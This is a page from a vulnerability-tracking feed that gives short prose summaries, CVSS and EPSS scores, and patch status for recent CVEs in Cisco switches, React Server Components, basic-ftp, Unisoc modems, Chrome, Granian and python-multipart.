Cisco SG350 and SG350X managed switches can be remotely crashed via crafted SNMP requests, forcing unexpected device reloads. Authenticated attackers with valid SNMP credentials (read-only or read-write community strings for SNMPv1/v2c, or user credentials for SNMPv3) can trigger a heap-based buffer overflow in SNMP response parsing. Cisco confirmed this vulnerability affects all three SNMP versions (v1, v2c, v3) and published advisory cisco-sa-sg350-snmp-dos-GEFZr2Tj. EPSS and KEV status not provided in available data; exploitation requires network access with low complexity but does require valid SNMP authentication.

Heap Overflow Denial Of Service Buffer Overflow Cisco
NVD
CVSS 3.1
7.7
EPSS
0.2%
CVE-2026-23870 HIGH PATCH GHSA This Week

Remote denial of service in React Server Components (react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack) versions 19.0.0-19.0.5, 19.1.0-19.1.6, and 19.2.0-19.2.5 allows unauthenticated remote attackers to crash servers, trigger out-of-memory exceptions, or exhaust CPU resources by sending specially crafted HTTP requests to server function endpoints. The CVSS 7.5 score reflects network-accessible, low-complexity exploitation requiring no privileges or user interaction, with high availability impact. No public exploit code or active exploitation confirmed at time of analysis, though EPSS data unavailable and vulnerability disclosed by Meta directly.

Denial Of Service Red Hat
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.3%
CVE-2026-44240 HIGH PATCH GHSA This Week

Remote unauthenticated attackers can trigger memory exhaustion and process-level denial of service in Node.js applications using basic-ftp by sending unterminated FTP multiline control responses during initial connection. The vulnerability occurs in the client library when connecting to malicious or compromised FTP servers, causing unbounded buffer growth in _partialResponse with repeated CPU-intensive reparsing. This affects automated FTP integrations for scheduled imports, customer-provided endpoints, backup jobs, and CI/CD pipelines. Publicly available exploit code exists per GitHub security advisory GHSA-rpmf-866q-6p89. CVSS 7.5 HIGH with network attack vector, low complexity, and no authentication required confirms practical remote exploitation risk.

Denial Of Service Node.js
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2025-71256 HIGH This Week

Remote denial of service in Unisoc T8100/T9100/T8200/T8300 chipset NR modem implementations allows unauthenticated network attackers to crash device cellular connectivity via malformed protocol input. The improper input validation in the 5G New Radio modem stack enables trivial remote service disruption requiring no user interaction or authentication. EPSS data not available; no evidence of active exploitation (not in CISA KEV). Affects mobile devices using these specific Unisoc chipset models in 5G NR mode.

Denial Of Service T8100 T9100 T8200 T8300
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-7929 HIGH PATCH This Week

Remote code execution in Google Chrome's MediaRecording component (versions prior to 148.0.7778.96) allows attackers to execute arbitrary code when victims perform specific UI interactions with a malicious webpage. The use-after-free vulnerability in memory management has been patched by Google in version 148.0.7778.96. EPSS data not available; no CISA KEV listing identified, suggesting no confirmed widespread exploitation at time of analysis, though publicly available exploit code exists per Chromium bug tracker disclosure.

Denial Of Service Use After Free Memory Corruption RCE Google +3
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-7897 HIGH PATCH This Week

Remote code execution in Google Chrome for iOS prior to version 148.0.7778.96 through use-after-free memory corruption in the mobile UI handler. Exploitation requires convincing a user to perform specific UI gestures while viewing a malicious HTML page. Google confirms Critical severity and has released a patched version. EPSS data unavailable; not currently listed in CISA KEV. Attack complexity is rated High due to the required user interaction pattern, limiting opportunistic exploitation but enabling targeted attacks via social engineering.

Denial Of Service Use After Free Memory Corruption RCE Apple +4
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-8007 HIGH PATCH This Week

Privilege escalation in Google Chrome's Cast component (versions prior to 148.0.7778.96) allows remote attackers to elevate from renderer to higher-privilege browser process via specially crafted HTML page after initial renderer compromise. Despite 7.5 CVSS score, Chromium security team rates this as Low severity, indicating limited real-world impact. Vendor patch released in version 148.0.7778.96. No public exploit identified at time of analysis.

Privilege Escalation Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2025-71251 HIGH This Week

Remote attackers can crash Unisoc chipset IMS (IP Multimedia Subsystem) implementations through network-accessible malformed input, causing complete denial of service with no authentication required. Affects 17 Unisoc chipset models (SC7731E, SC9832E, SC9863A, T-series T310 through T8300) used in mobile devices. CVSS 7.5 (High) reflects direct network exposure and ease of exploitation (AV:N/AC:L/PR:N), though impact is limited to availability. No public exploit code identified at time of analysis, and EPSS data not available for assessment.

Denial Of Service Sc7731E Sc9832E Sc9863A T310 T610 T618 T7200 T7225 T7250 T7255 T7280 T7300 T8100 T9100 T8200 T8300
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2025-71255 HIGH This Week

Remote denial of service in Unisoc modem IMS implementation across 16 chipset families (SC7731E through T8300) allows unauthenticated network attackers to crash mobile device modem services via crafted IMS traffic. The improper input validation vulnerability (CVSS 7.5) enables high-impact availability attacks against millions of deployed Android smartphones and IoT devices using Unisoc chipsets. No public exploit identified at time of analysis, with EPSS data unavailable for this recently disclosed January 2025 vulnerability.

Denial Of Service Sc7731E Sc9832E Sc9863A T310 T610 T618 T7200 T7225 T7250 T7255 T7280 T7300 T8100 T9100 T8200 T8300
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2025-71254 HIGH This Week

Remote denial of service in Unisoc modem IMS (IP Multimedia Subsystem) implementation allows unauthenticated network attackers to crash telephony services on affected chipsets through malformed input. Affects 16 Unisoc chipset models spanning SC and T series (SC7731E through T8300) used in budget and mid-range mobile devices. No public exploit identified at time of analysis. CVSS 7.5 (High) reflects network accessibility and service disruption potential, though EPSS data unavailable for risk prioritization.

Denial Of Service Sc7731E Sc9832E Sc9863A T310 T610 T618 T7200 T7225 T7250 T7255 T7280 T7300 T8100 T9100 T8200 T8300
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2025-71253 HIGH This Week

Remote denial of service in Unisoc modem IMS stack allows network attackers to crash affected devices through malformed input without authentication. Affects 16 Unisoc chipset families (SC7731E, SC9832E, SC9863A, T-series T310 through T8300) used in mobile devices. No authentication, user interaction, or special configuration required (CVSS AV:N/AC:L/PR:N/UI:N). No public exploit code or CISA KEV listing identified at time of analysis, though EPSS data unavailable for risk quantification.

Denial Of Service Sc7731E Sc9832E Sc9863A T310 T610 T618 T7200 T7225 T7250 T7255 T7280 T7300 T8100 T9100 T8200 T8300
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2025-71252 HIGH This Week

Remote denial of service in Unisoc Modem IMS stack allows unauthenticated network attackers to crash mobile devices through improper input validation. Affects 16 Unisoc chipset families (SC7731E through T8300) widely deployed in budget smartphones and IoT devices across global markets. No authentication, user interaction, or elevated privileges required for exploitation. EPSS data and KEV status not available; no public exploit identified at time of analysis.

Denial Of Service Sc7731E Sc9832E Sc9863A T310 T610 T618 T7200 T7225 T7250 T7255 T7280 T7300 T8100 T9100 T8200 T8300
NVD VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-42544 HIGH PATCH GHSA This Week

Granian ASGI server suffers remote denial of service when unauthenticated attackers send malformed WebSocket upgrade requests containing non-ASCII bytes in the Sec-WebSocket-Protocol header, causing worker process termination. Each crafted request kills one worker process; sequential requests across all workers achieve complete service outage. The vulnerability exists in Granian's pre-application WebSocket scope construction (src/asgi/utils.rs), making application-layer defenses ineffective. Publicly available exploit code exists with complete proof-of-concept demonstrating the attack. Vendor-released patch 2.7.4 addresses the issue for affected versions 1.2.0 through 2.7.3.

Python Denial Of Service
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-42561 HIGH PATCH GHSA This Week

CPU exhaustion in python-multipart allows remote unauthenticated attackers to cause denial of service through crafted multipart/form-data requests with unbounded header blocks. Applications using Starlette, FastAPI, or other ASGI frameworks that parse attacker-controlled file uploads are vulnerable to worker thread starvation and event-loop blocking. Vendor-released patch available in version 0.0.27, which enforces default limits on both header count and individual header size during multipart parsing.

Denial Of Service Python
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
Prev Page 4 of 11 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy